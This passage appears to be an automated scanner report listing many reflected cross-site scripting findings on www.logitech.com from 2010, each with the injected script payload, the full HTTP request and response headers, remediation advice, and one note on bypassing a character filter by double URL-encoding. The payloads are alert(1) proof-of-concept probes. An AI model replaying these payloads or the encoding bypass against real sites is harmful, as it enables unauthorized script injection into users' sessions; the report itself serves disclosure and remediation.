Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /6199b</script><script>alert(1)</script>5f89940f375/v2/temp/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f662c</script><script>alert(1)</script>a139f933ced was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f662c</script><script>alert(1)</script>a139f933ced/v2/temp/homepage/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0054"><script>alert(1)</script>e4939d69d3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /e0054"><script>alert(1)</script>e4939d69d3b/v2/temp/homepage/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cebfb"><script>alert(1)</script>289d42d9a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cebfb"><script>alert(1)</script>289d42d9a5f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 259e8</script><script>alert(1)</script>b817d4a553b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /259e8</script><script>alert(1)</script>b817d4a553b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the seo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5371</script><script>alert(1)</script>b29fce9f3be was submitted in the seo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm?seo=349/7073b5371</script><script>alert(1)</script>b29fce9f3be&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/349/7073
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f665</script><script>alert(1)</script>d5c8c7a6a58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7f665</script><script>alert(1)</script>d5c8c7a6a58/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 840f4"><script>alert(1)</script>3d50b96510f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /840f4"><script>alert(1)</script>3d50b96510f/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 362dd</script><script>alert(1)</script>7ed2178ad5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /362dd</script><script>alert(1)</script>7ed2178ad5f/175/478 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e132c"><script>alert(1)</script>f70807cda7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e132c"><script>alert(1)</script>f70807cda7e/175/478 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0581"%3b075acab1414 was submitted in the REST URL parameter 1. This input was echoed as e0581";075acab1414 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e0581"%3b075acab1414/175/478 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c082%2522%253b001b4c471fe was submitted in the REST URL parameter 2. This input was echoed as 1c082";001b4c471fe in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /index.cfm/1751c082%2522%253b001b4c471fe/478 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Apache AK-control: no-store Date: Fri, 12 Nov 2010 13:42:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38582</script><script>alert(1)</script>f142f3eda53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/17538582</script><script>alert(1)</script>f142f3eda53/478 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce75a"><script>alert(1)</script>794d751b863 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/175ce75a"><script>alert(1)</script>794d751b863/478 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fcca"><script>alert(1)</script>a3527082a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/175/4788fcca"><script>alert(1)</script>a3527082a3 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf73c</script><script>alert(1)</script>d4004f28315 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/175/478bf73c</script><script>alert(1)</script>d4004f28315 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da7e7"%3b5c6017e02fe was submitted in the REST URL parameter 1. This input was echoed as da7e7";5c6017e02fe in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /da7e7"%3b5c6017e02fe/265/6703&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7098"><script>alert(1)</script>8cab81c3b28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /a7098"><script>alert(1)</script>8cab81c3b28/265/6703&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28dd2</script><script>alert(1)</script>f419c213563 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /28dd2</script><script>alert(1)</script>f419c213563/265/6703&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3730"><script>alert(1)</script>1c837d3a7e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/265a3730"><script>alert(1)</script>1c837d3a7e4/6703&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6fce</script><script>alert(1)</script>ba297dff890 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/265c6fce</script><script>alert(1)</script>ba297dff890/6703&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95eae"><script>alert(1)</script>a26dcdc5a7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/265/670395eae"><script>alert(1)</script>a26dcdc5a7a&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc32e</script><script>alert(1)</script>6ba7cb6746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/265/6703fc32e</script><script>alert(1)</script>6ba7cb6746&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a70</script><script>alert(1)</script>6bdff5882c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /71a70</script><script>alert(1)</script>6bdff5882c6/349/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2baef"><script>alert(1)</script>76f65f48741 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /2baef"><script>alert(1)</script>76f65f48741/349/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
